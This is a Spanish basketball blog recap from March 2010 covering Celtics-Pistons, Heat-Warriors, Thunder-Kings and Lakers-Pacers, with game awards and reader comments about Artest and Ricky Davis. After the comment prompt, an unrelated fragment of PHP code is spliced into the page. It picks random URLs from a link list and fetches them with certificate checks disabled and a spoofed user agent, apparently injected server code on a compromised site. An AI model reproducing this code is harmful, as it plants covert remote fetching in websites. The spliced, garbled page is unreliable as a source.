La Crónica (02/03/2010)

03 de March de 2010 por telekoman

Sufrieron y mucho los Celtics para doblegar a los Pistons de Detroit lo cual tiene muchas lecturas ya que es evidente que ninguno de los dos equipos está en su mejor momento. Los Celtics aprovecharon los instantes finales para meter 11 tiros libres que decantaron el partido. Volvió Pierce a la alineación, Allen parece haber superado su bajón y Nate Robinson empieza a carburar mientras que Rondo sigue con un buen nivel. Enfrente tuvieron a un equipo con muchísimos problemas en ataque pero que les superó ampliamente en el rebote. Pero estos Pistons, sin una aportación más consistente de Villanueva y Gordon, optarán a poco o nada (¿quizás al John Wall Trophy?)

Respiran un poco más en Miami gracias a la apurada victoria de su equipo frente a Golden State. Claro que para eso necesitaron a un Wade superlativo. 35 puntos, 12 asistencias y 6 rebotes consiguió nuestro amigo Flash. No estuvo del todo sólo ya que Richardson y Beasley consiguieron 15 puntos y Jermaine O’Neal y Arroyo 14 puntos, a los que el center de los Heat añadió 12 rebotes. Pero aún así, no creo que nadie culpe a Wade cuando a final de temporada se vaya a otro equipo. Los de Oakland con muchísimas bajas: Biedrins, Ellis, Maggette y Radmanovic. Pero aún así pusieron en dificultades de los Heat gracias al buen partido de Anthony Morrow (24 puntos y 7 rebotes), de CJ Watson (otros 20 puntos y 6 robos) y de Stephen Curry, que dirigió bien a su equipo y consiguió 18 puntos y 8 asistencias. Estos también optan al John Wall Trophy, aunque tendrían un montón de jugadores de corte muy similar.

Oklahoma ganó a Sacramento, aunque con más dificultades de lo que dice la distancia que existe entre ambos en la clasificación. Nuevamente conducidos por su pareja fantástica, Durant y Westbrook, los Thunder se acomodan en la 6ª plaza del Oeste. Impresionante el partido de Durant que alcanzó los 39 puntos, con el 50% de acierto en tiro, y 10 rebotes. Pero es que Westbrook se fue hasta los 30 con 13 asistencias. Se nos quedan cortos los adjetivos. Pero al final los exigües 4 puntos de diferencia entre ambos equipos nos dicen dos cosas: Que habrá que vigilar a los Kings el año que viene y que quizás Durant y Westbrook estén un poco solos. Por los Kings nuevamente Tyreke Evans manejando el cotarro con soltura.

Y en el último partido de la jornada los Lakers pasaron por encima los Pacers. Muchos detalles y muy interesantes en el partido: Kobe a lo suyo, con una primera parte en  la que estuvo algo fallón pero que luego se recuperó sin problemas para anotar los 24 puntos a los que nos tiene acostumbrados, Murphy y Pau luchando en el poste. 17 puntos y 13 rebotes para el de Indiana, 14 puntos y 16 rebotes para el de Sant Boi, Bynum pudiendo sin muchos problemas con Hibbert y sobre todo una gran defensa de Artest sobre un Danny Granger que estuvo totalmente desaparecido. Conclusión, al empezar el último cuarto el partido estaba algo más que decidido.

PREMIOS

MVP: Wade, Durant. Durant, Wade. No tengo muy claro a quien asignarselo, así que vamos a hacer algo mejor. El premio se lo vamos a dar a la combinación Durant y Westbrook. 69 puntos, 15 rebotes y 15 asistencias entre los dos. Impresionante.

Rookie: También dos candidatos al premio. Stephen Curry con 18 puntos y 8 asistencias y Tyreke Evans con 27 puntos, 6 rebotes y 5 asistencias. Esta vez se lo daremos al de Sacramento que se está manteniendo esupendamente en la carrera para el Rookie del Año.

Sorpresa: Pocas sorpresas esta vez ya que todo ha seguido el guión. Tal vez la escasa diferencia en los partidos de Boston y Oklahoma. Aquí hasta el más tonto te puede hacer un traje.

Decepción: El escaso tendimiento de Danny Granger acosado hasta el extremo por un Artest que está afilando las garras. Puede ser el fichaje perfecto para los Lakers.

Mayor esfuerzo en vano: Sin duda las actuaciones de los dos rookies de los que hablabamos antes se debe considerar también en esta categoría.

Comenta

6 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Ya me estoy muriendo de ganas para ver a Kobe y Artest ponerse a defender a nivel playoffs.

      Citar

  2. sayim dice:
    #2

    El otro dia tuviste una muestra contra los Nuggets en la segunda parte….

      Citar

  3. TheDeerHunter dice:
    #3

    y es que a mí me da que sólo fue un aperitivo

      Citar

  4. Love Denise dice:
    #4

    ricky davis ficha por el turk telekom, equipo turco, veremos a ver si aguanta hasta el final de temporada.

      Citar

  5. Txusma dice:
    #5

    El gran Ricky Davis… Este fue el que cuando estaba a un solo rebote del triple doble tiro a su propio tablero, no?

      Citar

  6. TheDeerHunter dice:
    #6

    Sí, el mismo que viste y calza.
    Solo que por aquel entonces parecía un jugador solvente y todo. Diría que aquel fue el último partido bueno que le recuerdo (hasta aquel momento, claro)

    Es impresionante como una idiotez como esa, o un instante de estupidez puede cambiar tanto la carrera de un jugador.

    Estaría bien escribir un artículo sobre los pequeños acontecimientos que cambiaron la vida de ciertos jugadores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>